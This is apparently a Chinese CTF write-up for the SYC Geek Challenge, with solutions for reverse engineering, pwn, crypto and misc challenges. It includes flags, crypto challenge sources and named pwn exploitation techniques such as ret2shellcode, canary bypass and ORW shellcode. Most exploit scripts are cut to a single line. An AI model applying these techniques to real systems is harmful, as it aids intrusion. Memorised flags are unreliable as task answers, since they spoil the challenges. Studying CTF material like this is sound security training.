带符号解密:
1 |
|
在MainActivity2中查看逻辑为:
1 | iArr=[-107, -106, -95, -115, -119, 127, 26, 121, -62, -20, 86, 9] = '9596a18d897f1a79c2ec5609' |
合并得到flag:SYC{T00nV3tD3F34Tint0vict0rY}
是男人就来扎针
简单的游戏逆向送分题,最终flag记得包裹上SYC{}
ILSPY反编译,在 public class GameManager 找到代码逻辑。
1 | magicc = [75, 109, 102, 63, 107, 112, 63, 108, 124, 112, |
flag:SYC{CBDDD133B60130856D3C695D9E5ED6A5}
PWN
nc_pwntools
1 | from pwn import * |
password
概率性getshell。
1 | from pwn import * |
ret2text
开了PIE,概率性getshell。
1 | from pwn import * |
write1
按字节修改返回地址为后门函数 backdoor() 地址,修改2个字节即可。
1 | from pwn import * |
ret2libc
(代码待补充)
ezpwn
先做这题,简单
(代码待补充)
write2
栈地址泄露,栈可写,写24长度内的shellcode,while循环改写retaddr为栈地址,ret2shellcode。
1 | from pwn import * |
fmt1.0
(代码待补充)
white_canary
远程之前记得“sudo ntpdate cn.pool.ntp.org” 同步下时间
init() 自己实现了canary计算方法,禁用了59,无法 execve。
伪随机数算canary+写orw的shellcode+ret2shellcode。
1 | from pwn import * |
ez_fullprotection
scanf泄露_start地址绕PIE,线程溢出TLS覆盖canary。
1 | from pwn import * |
CRYPTO
SignIn
Bibo…Hello! 你好! こんにちは! Привет! 5359437b48656c6c6f5f576f726c645f43727970746f5f6269626f6269626f7d… Hmm… Something goes wrong with my grettings bot.
16进制转字符串:SYC{Hello_World_Crypto_bibobibo}。
proof_of_work
题目链接:nc 59.110.20.54:5526 Build your own function to solve proof_of_work!
PoW代码:
1 | from pwn import * |
SimpleRSA
So simple RSA! Wait… Are you kidding me? https://en.wikipedia.org/wiki/RSA_(cryptosystem) hint: flag<p
2
3
4
5
6
7
8
9
10
11
12
from Crypto.Util.number import *
flag = b"SYC{Al3XEI_FAKE_FLAG}"
assert len(flag) == 35
p,q = [getPrime(2048) for _ in "__"]
n = p*q
e = 65537
c = gmpy2.powmod(bytes_to_long(flag),e,n)
print(p)
print(c)
#24724324630507415330944861660078769085865178656494256140070836181271808964994457686409910764936630391300708451701526900994412268365698217113884698394658886249353179639767806926527103624836198494439742123128823109527320850165486500517304731554371680236789357527395416607541627295126502440202040826686102479225702795427693781581584928770373613126894936500089282093366117940069743670997994742595407158340397268147325612840109162997306902492023078425623839297511182053658542877738887677835528624045235391227122453939459585542485427063193993069301141720316104612551340923656979591045138487394366671477460626997125944456537
#510345661718450375632304764819724223824018609359964259503762283253350010161515190912152623604019093266967095847334388281390406831587663253164256543905694021952211220652820225527413861208452760215767828927039893435528572148282529198773772864255061213208279999011194952146362748485103032149806538140693537361755210176698895104708379400806511907719904867068865970241208806615061055047254026118016836750283966478103987375361826198930529462261013324904522014804502582865716441828895047550041401172127129749969507853355531197814919603963664646220505672302543085959372679395717892060245461464861507164276442140407308832537707450729432224150754603518526288767105682399190438680085925078051459448618725871249563011864525585870188123725554411655044152994826056900502298772802133526591794328224932405680583757307064395792317383571866619582974377344736930271554160701478385763426091091686496788999588340419226785217028504684542197970387916262126278955278523452903043316452825738030645100271595942652498852506660789605846309602343932245435421425673058238785509280366229754404949219663043627431437755087855502139890639468481922788973821783957766433857773771229298328019250652625289700950165414584983487319078090573179470893450632419467111117341472
$d = e^{-1} \bmod p,\;\;\; m = c^d \bmod p$。
1 | e = 65537 |
OTPTwice
I invented a new symmetric cryptosystem, and I believe you will never break it!
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
from os import urandom
flag = b"SYC{Al3XEI_FAKE_FLAG}"
# step0: key generation & distribution
def s0(msg):
k1,k2 = [urandom(len(msg)) for _ in "__"]
return k1,k2
#
# step1: Alice encrypt M, and send it to Bob
def s1(msg,k1):
c1 = xor(msg,k1)
return c1
# step2: Bob encrypt c1, and send it to Alice
def s2(msg,k2):
c2 = xor(msg,k2)
return c2
# step3: Alice decrypt c2, and send it to Bob.
def s3(msg,k1):
c3 = xor(msg,k1)
return c3
# step4: Bob decrypt c3, get M.
def s4(msg,k2):
m_ = xor(msg,k2)
return m_
def encrypt(msg,k1,k2):
c1 = s1(msg,k1)
c2 = s2(c1,k2)
c3 = s3(c2,k1)
m_ = s4(c3,k2)
assert msg == m_
# Here's what hacker Eve got:
def encrypt_(msg,k1,k2):
c1 = s1(msg,k1)
c2 = s2(c1,k2)
c3 = s3(c2,k1)
m_ = s4(c3,k2)
if HACK == True:
print(c1)
print(c2)
print(c3)
k1,k2 = s0(flag)
encrypt_(flag,k1,k2)
'''
b'\xdbi\xab\x8d\xfb0\xd3\xfe!\xf8Xpy\x80w\x8c\x87\xb9'
b'o\xb0%\xfb\xdb\x0e\r\x04\xde\xd1\x9a\x08w\xda4\x0f\x0cR'
b'\xe7\x80\xcd\ria\xb2\xca\x89\x1a\x9d;|#3\xf7\xbb\x96'
'''
推导有 $m = c_1 \oplus c_2 \oplus c_3$。
1 | from Crypto.Util.strxor import strxor |
OldAlgorithm
An old algorithm but widely used nowadays.
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import os
flag = b"SYC{Al3XEI_FAKE_FLAG}"
pad = lambda msg,padlen: msg+os.urandom(padlen-len(msg))
flag = pad(flag,32)
print(len(flag))
p = [getPrime(16) for _ in range(32)]
c = [bytes_to_long(flag)%i for i in p]
print('p=',p)
print('c=',c)
'''
p= [58657, 47093, 47963, 41213, 57653, 56923, 41809, 49639, 44417, 38639, 39857, 53609, 55621, 41729, 60497, 44647, 39703, 55117, 44111, 57131, 37747, 63419, 63703, 64007, 46349, 39241, 39313, 44909, 40763, 46727, 34057, 56333]
c= [36086, 4005, 3350, 23179, 34246, 5145, 32490, 16348, 13001, 13628, 7742, 46317, 50824, 23718, 32995, 7640, 10590, 46897, 39245, 16633, 31488, 36547, 42136, 52782, 31929, 34747, 29026, 18748, 6634, 9700, 8126, 5197]
'''
CRT算法。
1 | p = [58657, 47093, 47963, 41213, 57653, 56923, 41809, 49639, 44417, 38639, 39857, 53609, 55621, 41729, 60497, 44647, 39703, 55117, 44111, 57131, 37747, 63419, 63703, 64007, 46349, 39241, 39313, 44909, 40763, 46727, 34057, 56333] |
easy_classic
非常好套娃,使我的古典旋转
每一层解出的字符串为下一层zip压缩包密码。
第1层:udzeojxuwqcu,ROT10,得:enjoythegame
第2层:ialhhooavtepcyr,栅栏7,得:ilovecryptohaha
第3层:5a6H5a6Z5LiH5rOV55qE6YKj5Liq5rqQ5aS0,base64,得:宇宙万法的那个源头
第4层:熊曰:呋食食食取噗山笨笨破嗄咯哈動嗡雜類嗒嘿啽沒歡破吖咬我啽寶盜噔咯沒,熊曰解密,得:never gonna give you up
第5层:password: adltlfltqrcy,key: 👝👘👠👩👞👘👤👜,
先base100,得:key=fairgame,再playfair,得:genshinstart
flag:SYC{classical_1s_fun}
PolyRSA
Harder RSA. Check it out!
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
from Crypto.Util.number import *
flag = b"SYC{Al3XEI_FAKE_FLAG}"
p,q = [getPrime(2048) for _ in "__"]
e1,e2 = [getPrime(17) for _ in "__"]
e = 65537
n = p*q
c1 = gmpy2.powmod(2*p + 3*q,e1,n)
c2 = gmpy2.powmod(5*p + 7*q,e2,n)
c = gmpy2.powmod(bytes_to_long(flag),e,n)
print("e1=",e1)
print("e2=",e2)
print("c1=",c1)
print("c2=",c2)
print("c=",c)
print("n=",n)
#e1= 113717
#e2= 80737
#c1= 97528398828294138945371018405777243725957112272614466238005409057342884425132214761228537249844134865481148636534134025535106624840957740753950100180978607132333109806554009969378392835952544552269685553539656827070349532458156758965322477969141073720173165958341043159560928836304172136610929023123638981560836183245954461041167802574206323129671965436040047358250847178930436773249800969192016749684095882580749559014647942135761757750292281205876241566597813517452803933496218995755905344070203047797893640399372627351254542342772576533524820435965479881620338366838326652599102311019884528903481310690767832417584600334987458835108576322111553947045733143836419313427495888019352323209000292825566986863770366023326755116931788018138432898323148059980463407567431417724940484236335082696026821105627826117901730695680967455710434307270501190258033004471156993017301443803372029004817834317756597444195146024630164820841200575179112295902020141040090350486764038633257871003899386340004440642516190842086462237559715130631205046041819931656962904630367121414263911179041905140516402771368603623318492074423223885367923228718341206283572152570049573607906130786276734660847733952210105659707746969830132429975090175091281363770357
#c2= 353128571201645377052005694809874806643786163076931670184196149901625274899734977100920488129375537186771931435883114557320913415191396857882995726660784707377672210953334914418470453787964899846194872721616628198368241044602144880543115393715025896206210152190007408112767478800650578941849344868081146624444817544806046188600685873402369145450593575618922226415069043442295774369567389939040265656574664538667552522329712111984168798829635080641332045614585247317991581514218486004191829362787750803153463482021229058714990823658655863245025037102127138472397462755776598314247771125981017814912049441827643898478473451005083533693951329544115861795587564408860828213753948427321483082041546722974666875065831843384005041800692983406353922680299538080900818930589336142421748023025830846906503542594380663429947801329079870530727382679634952272644949425079242992486832995962516376820051495641486546631849426876810933393153871774796182078367277299340503872124124714036499367887886486264658590613431293656417255355575602576047502506125375605713228912611320198066713358654181533335650785578352716562937038768171269136647529849805172492594142026261051266577821582011917001752590659862613307646536049830151262848916867223615064832279222
#c= 375617816311787295279632219241669262704366237192565344884527300748210925539528834207344757670998995567820735715933908541800125317082581328287816628816752542104514363629022246620070560324071543077301256917337165566677142545053272381990573611757629429857842709092285442319141751484248315990593292618113678910350875156232952525787082482638460259354559904243062546518553607882194808191571131590524874275187750985821420412987586148770397073003186510357920710387377990379862185266175190503647626248057084923516190642292152259727446111686043531725993433395002330208067534104745851308178560234372373476331387737629284961288204368572750848248186692623500372605736825205759172773503283282321274793846281079650686871355211691681512637459986684769598186821524093789286661348936784712071312135814683041839882338235290487868969391040389837253093468883093296547473466050960563347060307256735803099039921213839491129726807647623542881247210251994139130146519265086673883077644185971830004165931626986486648581644383717994174627681147696341976767364316172091139507445131410662391699728189797082878876950386933926807186382619331901457205957462337191923354433435013338037399565519987793880572723211669459895193009710035003369626116024630678400746946356
#n= 728002565949733279371529990942440022467681592757835980552797682116929657292509059813629423038094227544032071413317330087468458736175902373398210691802243764786251764982802000867437756347830992118278032311046807282193498960587170291978547754942295932606784354258945168927044376692224049202979158068158842475322825884209352566494900083765571037783472505580851500043517614314755340168507097558967372661966013776090657685241689631615245294004694287660685274079979318342939473469143729494106686592347327776078649315612768988028622890242005700892937828732613800620455225438339852445425046832904615827786856105112781009995862999853122308496903885748394541643702103368974605177097553007573113536089894913967154637055293769061726082740854619536748297829779639633209710676774371525146758917646731487495135734759201537358734170552231657257498090553682791418003138924472103077035355223367678622115314235119493397080290540006942708439607767313672671274857069053688258983103863067394473084183472609906612056828326916114024662795812611685559034285371151973580240723680736227737324052391721149957542711415812665358477474058103338801398214688403784213100455466705770532894531602252798634923125974783427678469124261634518543957766622712661056594132089
参考GKCTF 2021 - RRRRsa相关推导,消元求gcd得 $p$。
1 | e1= 113717 |
Simple3DES
题目链接:nc 59.110.20.54:23333 https://blog.csdn.net/Mr_wzc/article/details/121713518
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
from Crypto.Util.number import *
import os
import random
import string
import hashlib
xor = lambda a,b: bytes([a[i % len(a)] ^ b[i % len(b)] for i in range(max(len(a), len(b)))])
pad = lambda msg,padlen: msg+chr((padlen-(len(msg)%padlen))).encode()*(padlen-(len(msg)%padlen))
flag = os.environ.get("FLAG", "SYC{Al3XEI_FAKE_FLAG}").encode()
sec = os.urandom(8)
banner = '|'*70
DEBUG = False
def proof_of_work():
if DEBUG:
return True
proof = ''.join([random.choice(string.ascii_letters+string.digits) for _ in range(20)])
digest = hashlib.sha256(proof.encode()).hexdigest()
print("sha256(XXXX+%s) == %s" % (proof[4:], digest))
x = input("Give me XXXX: ")
if len(x)!=4 or hashlib.sha256((x+proof[4:]).encode()).hexdigest() != digest:
return False
print("Right!")
return True
def enc(msg,key):
try:
key = long_to_bytes(key)
msg = xor(long_to_bytes(msg),sec)
des = DES3.new(key,DES3.MODE_ECB)
ct = xor(des.encrypt(pad(msg,8)),sec)
return bytes_to_long(ct)
except Exception as e:
print(e)
return Exception
def service():
cnt = 0
if not proof_of_work():
exit()
print(banner)
print('Simple DES Encryption Service')
print(banner)
while cnt<2:
print('1. Encrypt\n2. Get encrypted flag.')
choice = int(input('> '))
if choice == 1:
print('Input msg:')
msg = int(input('> ').strip())
print('Input key:')
key = int(input('> ').strip())
print(enc(msg,key))
elif choice == 2:
print('Input key:')
key = int(input('> ').strip())
print(enc(bytes_to_long(flag),key))
else:
exit()
cnt+=1
print(banner)
print('Bye!')
exit()
try:
service()
except Exception:
print("Something goes wrong...\n")
print(banner+'\n')
exit()
代码问题在先xor后pad,对于 m=b'\x00',有 m^sec=sec,pad(sec,8)=sec+b'\x08'*8。
第一轮:
pad(sec,8)=sec+b'\x08'*8,加密得到 c1^x | c2^x,又由 b'\x08'*8 可求出 c2,得到 x。
第二轮:
已知 c'^x,解密得到 flag^x,再异或得到 flag。
1 | from pwn import * |
JPGDiff
图片中的字符串即为flag
提示图片为Hilbert曲线,且长图为1*65536的jpg图片,符合8阶Hilbert曲线的节点数。
按8阶Hilbert曲线的顺序来布置每一个1*1像素,即可还原原始图片。
利用hilbertcurve包完成构造:
1 | from hilbertcurve.hilbertcurve import HilbertCurve |
得到图片:
flag:SYC{H1LB5RT_C1pher}
Energetic_Carcano
题目链接:nc 59.110.20.54:8763 https://en.wikipedia.org/wiki/Elliptic-curve_cryptography
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
import os
import random
import string
import hashlib
from Crypto.Util.number import *
DEBUG = True
banner = '|'*70
flag = os.environ.get("FLAG", b"SYC{Al3XEI_FAKE_FLAG}").encode()
pbits = 120
abp = "abp"
def proof_of_work():
if DEBUG:
return True
proof = ''.join([random.choice(string.ascii_letters+string.digits) for _ in range(20)])
digest = hashlib.sha256(proof.encode()).hexdigest()
print("sha256(XXXX+%s) == %s" % (proof[4:], digest))
x = input("Give me XXXX: ")
if len(x)!=4 or hashlib.sha256((x+proof[4:]).encode()).hexdigest() != digest:
return False
print("Right!")
return True
def check(a,b,p,turn,ans):
if DEBUG:
return True
try:
if turn == "a":
return int(a) == ans
if turn == "b":
return int(b) == ans
if turn == "p":
return int(p) == ans
except Exception:
exit()
try:
if not proof_of_work():
exit()
print(banner)
print('\nHi Crypto-ers! AL3XEI here. I know you are excellent at math, so I prepared a game for u.')
print('In the equation y^2 = x^3+ a*x + b (mod p), 4 points are given. Plz give me the right a, b or p to contine the game.')
print('Good Luck!\n')
print(banner+'\n')
for i in range(10):
turn = random.choice(abp)
p = getPrime(pbits)
a,b = [next_prime(random.randint(2,p)) for _ in "ab"]
curve = EllipticCurve(GF(p),[a,b])
pts = [curve.random_point() for _ in range(4)]
pts = [(_[0], _[1]) for _ in pts]
for _ in pts:
print(_,end=" ")
print('\nGive me '+turn+" :")
ans = int(input('> '))
if check(a,b,p,turn,ans):
print("Good! Next challenge->\n")
print(banner+'\n')
pbits+=5
continue
else:
print("Something goes wrong...\n")
print(banner+'\n')
exit()
print('Congrats! Your flag is:',flag)
except Exception:
print("Something goes wrong...\n")
print(banner+'\n')
exit()
类似LCG计算 $a,b,p$ 的方法,利用结式计算 $a,b,p$。
1 | from pwn import * |
Just need One
题目链接:nc 59.110.20.54:2613 One bullet to kill all Outlaws.
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import random
import string
import hashlib
flag = os.environ.get("FLAG", b"SYC{Al3XEI_FAKE_FLAG}")
DEBUG = False
banner = '|'*70
if DEBUG:
print("==DEBUG MODE==")
def proof_of_work():
if DEBUG:
return True
proof = ''.join([random.choice(string.ascii_letters+string.digits) for _ in range(20)])
digest = hashlib.sha256(proof.encode()).hexdigest()
print("sha256(XXXX+%s) == %s" % (proof[4:], digest))
x = input("Give me XXXX: ")
if len(x)!=4 or hashlib.sha256((x+proof[4:]).encode()).hexdigest() != digest:
return False
print("Right!")
return True
try:
if not proof_of_work():
exit()
print(banner)
parms = [random.getrandbits(32) for _ in range(128)]
res = res = int(input('Give me x calculating f(x) :\n> '))
if res >= 2**32:
print("Give me something smaller.\n")
print(banner+'\n')
exit()
cnt = 0
for _ in range(128):
cnt += pow(res,_)*parms[_]
print(cnt)
ans = input('Give me Coefficients :\n> ')
ans = [int(_) for _ in ans.split(",")]
if ans == parms:
print('Congrats! Your flag is:',flag)
else:
exit()
except Exception:
print("Something goes wrong...\n")
print(banner+'\n')
exit()
本质是进制转换的计算方法,提供 $x$ 后给出 $\sum\limits_{i=0}^{128}p_ix^i$,求各 $p_i$。利用取余和整除计算即可。
1 | from pwn import * |
Fi1nd_th3_x’
听说在那个大陆有位叫jrl777的旅行者……Cryptoer穿越到了提瓦特就要拿出真本事!
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
from libnum import*
from secret import flag
p = getPrime(512)
q = getPrime(512)
r = getPrime(512)
e = getPrime(32)
n = p*q*r
phi = (p-1)*(q-1)*(r-1)
d = inverse(e,phi)
dP = d%((q-1)*(r-1))
dQ = d%((p-1)*(r-1))
dR = d%((p-1)*(q-1))
m = s2n(flag.encode())
c = pow(m,e,n)
print('p=',p)
print('q=',q)
print('r=',r)
print('dP=',dP)
print('dQ=',dQ)
print('dR=',dR)
print('c=',c)
'''
p= 13014610351521460822156239705430709078128228907778181478242620569429327799535062679140131416771915929573454741755415612880788196172134695027201422226050343
q= 12772373441651008681294250861077909144300908972709561019514945881228862913558543752401850710742410181542277593157992764354184262443612041344749961361188667
r= 12128188838358065666687296689425460086282352520167544115899775800918383085863282204525519245937988837403739683061218279585168168892037039644924073220678419
dP= 116715737414908163105708802733763596338775040866822719131764691930369001776551671725363881836568414327815420649861207859100479999650414099346914809923964116101517432576562641857767638396325944526867458624878906968552835814078216316470330511385701105459053294771612727181278955929391807414985165924450505855941
dQ= 44209639124029393930247375993629669338749966042856653556428540234515804939791650065905841618344611216577807325504984178760405516121845853248373571704473449826683120387747977520655432396578361308033763778324817416507993263234206797363191089863381905902638111246229641698709383653501799974217118168526572365797
dR= 60735172709413093730902464873458655487237612458970735840670987186877666190533417038325630420791294593669609785154204677845781980482700493870590706892523016041087206844082222225206703139282240453277802870868459288354322845410191061009582969848870045522383447751431300627611762289800656277924903605593069856921
c= 93063188325241977486352111369210103514669725591157371105152980481620575818945846725056329712195176948376321676112726029400835578531311113991944495646259750817465291340479809938094295621728828133981781064352306623727112813796314947081857025012662546178066873083689559924412320123824601550896063037191589471066773464829226873338699012924080583389032903142107586722373131642720522453842444615499672193051587154108368643495983197891525747653618742702589711752256009
'''
由于 $m<qr,m<pr,m<pq$,故 $m=c^{dP} \bmod {qr}=c^{dQ} \bmod {pr}=c^{dR} \bmod {pq}$,否则需应用CRT来求 $m$。
1 | p= 13014610351521460822156239705430709078128228907778181478242620569429327799535062679140131416771915929573454741755415612880788196172134695027201422226050343 |
Quick_Robert
题目链接:nc 59.110.20.54:3042 https://en.wikipedia.org/wiki/Quadratic_residue
参考 Some sums of Legendre’s symbols,利用二次剩余的求和特性计算:
$\sum\limits_{x=0}^{p-1}\left(\cfrac{ax^2+bx+c}p\right) = \left\{\begin{array}{cl}-\left(\cfrac ap\right),& p \nmid b^2-4ac \newline (p-1)\left(\cfrac ap\right),
& p \mid b^2-4ac \end{array}\right.$
1 | from pwn import * |
Diligent_Liszt
https://en.wikipedia.org/wiki/Discrete_logarithm
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import random
from Crypto.Util.number import *
DEBUG = False
flag = b"SYC{Al3XEI_FAKE_FLAG}"
assert flag.startswith(b"SYC")
nbits = 512
g = 3
def gen_p_1(digit):
primes = []
pri = 1
while(len(primes)<100):
pri = gp.next_prime(pri)
primes.append(int(pri))
while True:
count = 2
while count < 2**digit:
count *= random.choice(primes)
count += 1
if(gp.is_prime(count)):
return count
p,q,r = [gen_p_1(nbits) for _ in "pqr"]
n = p*q*r
x = bytes_to_long(flag)
y = gp.powmod(g,x,n)
print("p = {}".format(p))
print("q = {}".format(q))
print("r = {}".format(r))
print("y = {}".format(y))
if DEBUG:
print("x = {}".format(x))
'''
p = 1068910928091265978478887270179608140018534288604159452828300604294675735481804963679672853224192480667904101881092533866322948043654533322038484907159945421
q = 1711302770747802020613711652777299980542669713888988077474955896217408515180094849053961025086865697904731088087532944829046702427480842253022459937172565651
r = 132969813572228739353704467775972551435751558645548804253458782569132362201099158857093676816706297676454547299888531536236748314013888413096371966359860637
y = 5385116324746699759660077007129548063211490907227715474654765255668507958312745677683558789874078477569613259930365612562164095274660123330458355653249805062678976259429733060364358954180439218947514191603330532117142653558803034110759332447742304749985874760435453594107494324797235909651178472904825071375135846093354526936559640383917210702874692725723836865724807664892994298377375580807917514349966834376413176898806591411038129330967050554114677719107335006266
'''
DLP,Pohlig–Hellman算法+CRT。
1 | p = 1068910928091265978478887270179608140018534288604159452828300604294675735481804963679672853224192480667904101881092533866322948043654533322038484907159945421 |
card_game
AL3XEI送给了你这个游戏的关键数据,你能预测接下来要出的牌吗 nc 59.110.20.54 4953
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
from cards import Heart, Spade, Club, Diamond
from secret import flag
def choose_card(num):
x = (num>>5)%4
if x == 0:
return (Heart[(num>>6)%13]), 'Heart'
if x%4 == 1:
return (Spade[(num>>6)%13]), 'Spade'
if x%4 == 2:
return (Diamond[(num>>6)%13]), 'Diamond'
else:
return (Club[(num>>6)%13]), 'Club'
def GAME():
banner = '''
#### ## ##### ##### #### ## # # ######
# # # # # # # # # # # # ## ## #
# # # # # # # # # # # ## # #####
# ###### ##### # # # ### ###### # # #
# # # # # # # # # # # # # # #
#### # # # # ##### #### # # # # ######
'''
print(banner)
meum = '''option:
1: start game
2: get hint
3: exit
'''
print(meum)
while True:
print('input your option: ', end='')
your_input = input()
if your_input == '1':
n = getPrime(36)
m = getPrime(16)
c = getPrime(16)
seed = getPrime(36)
out = seed
round = 0
score = 0
res = []
while True:
round += 1
res = []
print(f'round:{round}')
print(f'score:{score}')
for i in range (3):
out = (out*m+c)%n
res.append(out)
if round == 1:
for i in res:
card, suit = choose_card(i)
print(card)
elif round==2 or round==3: #gift
for i in res:
card, suit = choose_card(i)
print(card)
print(f'gift: {res}')
else:
cards = []
suits = []
for i in range(len(res)):
card, suit = choose_card(res[i])
cards.append(card)
suits.append(suit)
print("Give me your guess: (example: Heart_1 Club_2 Diamond_3)")
try:
g_1, g_2, g_3 = input().split()
g_1, g_2, g_3 = g_1.split('_'), g_2.split('_'), g_3.split('_')
except ValueError:
print("Please enter in the correct format.")
return
if (g_1[0] == suits[0] and g_1[1] == cards[0][15]) and (g_2[0] == suits[1] and g_2[1] == cards[1][15]) and (g_3[0] == suits[2] and g_3[1] == cards[2][15]):
for i in cards:
print(i)
print("Congratulations! You matched the cards!")
score += 1
else:
for i in cards:
print(i)
print("Try again!")
if score == 50:
print('The flag is your reward!')
print(flag)
return
else:
continue
if your_input == '2':
print("Have you ever heard of LCG?")
if your_input == '3':
break
if __name__ == '__main__':
GAME()
代码逻辑本质是LCG,有个坑点,比对的时候,10是0。
1 | from pwn import * |
EzComplex
And u, my friend: Complex factors! (In a double sense)
高斯整数分解。
1 | c = 122977267154486898127643454001467185956864368276013342450998567212966113302012584153291519651365278888605594000436279106907163024162771486315220072170917153855370362692990814276908399943293854077912175867886513964032241638851526276 |
再常规RSA:
1 | p,q = (8732781022306464325787401448517171026218291389436971731700810979177651389459896422549428444142746055523338740248707, 29962125885196559918101088622575501736433575381042696980660846307183241725227137854663856022170515177120773072848343) |
ext^7gcd
题目链接:nc 59.110.20.54:1789 (下sagemath! 不下的统统发配到安东星当嘿奴!)
分析:
1 | a1*p1+a2*p2=1 |
1 | from pwn import * |
Algebra
Recently jrl888 has learned something about groebner_basis.But could U plz help him to sovle his linear algebra homework?
矩阵 1*32 * 32*16 = 1*16,构造格规约:
1 | p = 76231309481023608274751321361920497941621991893430257210800219032855778863403 |
再根据
1 | x1^e0%p=c0 |
1 | key = [241, 234, 29, 209, 141, 236, 196, 125, 153, 121, 243, 104, 157, 250, 164, 197, 241, 85, 184, 247, 145, 27, 128, 184, 203, 233, 104, 196, 118, 255, 12, 24] |
flag:SYC{You_are_really_algebra_master}。
MISC
cheekin
请前往”三叶草小组Syclover”微信公众号输入flag获得flag
发送flag,下载图片,zsteg的b1,rgb,lsb,xy通道有 syc{s4y_he110_t0_syclover}。
ez_smilemo
游戏通关即可得到flag内容,需要自行添加
SYC{}包含。例: flag内容为 haha_haha 则最终flag为 SYC{haha_haha} 题目链接:https://pan.baidu.com/s/1Vfklz0_isBoHNylRv8um8w?pwd=geek hint: data.win
使用UndertaleModTool工具解包data.win,在string窗口找到:c20xbGVfMXNfQF9uMWNlX2dAbWU=,base64解码:sm1le_1s_@_n1ce_g@me。
flag:SYC{sm1le_1s_@_n1ce_g@me}
DEATH_N0TE
“o2takuXX突然失踪了,你作为他的好朋友,决定去他的房间看看是否留下了什么线索…”。前置剧情题,flag有两段,隐写的信息有点多记得给信息拿全。 hint1: Stegsolve lsb hint2: 图片大小和像素点
png图片末尾提取出:
IuS9oOaJvuWIsOS6huS4gOacrOOAikRFQVRIIE5PVEXjgIvvvIzlpb3lpYflv4PpqbHkvb/kvaDnv7vlvIDov5nmnKznrJTorrDvvIzkvaDpmIXor7vkuobkvb/nlKjop4TliJnvvIzkvYbmmK/kvaDmg4rorrblnLDlj5HnjrDliJrmiY3nmoTop4TliJnkuYvkuK3llK/ni6zmsqHmnInnrKwxMOadoS4uLiIKIuS9oOWGjeasoeWOu+ehruiupOaYr+WQpuWmguatpO+8jOeslOiusOS4iueahOaWh+Wtl+WNtOS7v+S9m+a0u+S6hui1t+adpe+8jOWcqOS9oOecvOS4reS4jeaWreWcsOaUvuWkp+e8qeWwj++8jOS9oOmXreS4iuS6huWPjOecvC4uLiIKIuWOn+acrOm7keiJsueahOaWh+Wtl+S4gOi9rOWPmOaIkOihgOe6ouiJsu+8jOivoeW8gueahOeUu+mdoui/mOaYr+WHuueOsOS6juS9oOeahOinhue9keiGnOWJje+8jOS9oOWGs+WumuS4jeWGjee6oOe7k+S6jumBl+WkseeahOinhOWIme+8jOW5u+iniea2iOWkseS6hi4uLiI=
base64解码:
"你找到了一本《DEATH NOTE》,好奇心驱使你翻开这本笔记,你阅读了使用规则,但是你惊讶地发现刚才的规则之中唯独没有第10条..." "你再次去确认是否如此,笔记上的文字却仿佛活了起来,在你眼中不断地放大缩小,你闭上了双眼..." "原本黑色的文字一转变成血红色,诡异的画面还是出现于你的视网膜前,你决定不再纠结于遗失的规则,幻觉消失了..."
没什么用,zsteg 在 b1,rgb,lsb,xy 通道提取出:
IuS9oOe7p+e7reinguWvn+aJi+S4iua8hum7keiJsueahOeslOiusOacrO+8jOWGt+mdmeS4i+adpeeahOS9oOWPkeeOsOS6huiXj+WcqOWwgemdouacgOS4i+i+ueeahOS4gOihjOWwj+WtlzpTWUN7RDRAVGhfTjB0NF8iCiLkvaDmtY/op4jov4fmlbTkuKrnrJTorrDmnKzvvIzlj6/mg5zlhajmmK/nqbrnmb3pobXvvIzlhbbkuK3mnInkuIDpobXkuI3nn6XpgZPooqvosIHmkpXmjonkuobvvIzkvaDmnIDnu4jov5jmmK/nv7vliLDkuobnvLrlpLHnmoTpgqPkuIDpobUiCiLkvaDnlKjpk4XnrJTmtoLmirnnnYDlkI7pnaLkuIDpobXvvIzkuIrpnaLnvJPnvJPlh7rnjrDkuobpgZflpLHnmoTnl5Xov7kuLi4i
base64解码:
"你继续观察手上漆黑色的笔记本,冷静下来的你发现了藏在封面最下边的一行小字:SYC{D4@Th_N0t4_" "你浏览过整个笔记本,可惜全是空白页,其中有一页不知道被谁撕掉了,你最终还是翻到了缺失的那一页" "你用铅笔涂抹着后面一页,上面缓缓出现了遗失的痕迹..."
得到flag前半段:SYC{D4@Th_N0t4_。
放大图片,可发现白色像素点,结合题目查找为死亡笔记字体,字符串:TkFNRV9vMnRha3VYWH0
base64解码得到flag后半段:NAME_o2takuXX}。
flag:SYC{D4@Th_N0t4_NAME_o2takuXX}
下一站是哪儿呢
我和yxx去旅游,前一天还好好的,玩完《指挥官基恩》这个游戏就睡觉了,第二天晚上吃完饭她人就不见了,走之前留下了两张图片就消失了。你能帮我找找她坐哪个航班去哪个地方了嘛? flag格式:SYC{航班号_城市拼音},城市拼音首字母大写噢
查询 有白色钢琴的机场,配合百度以图搜图功能,查找到地点为:深圳宝安国际机场。
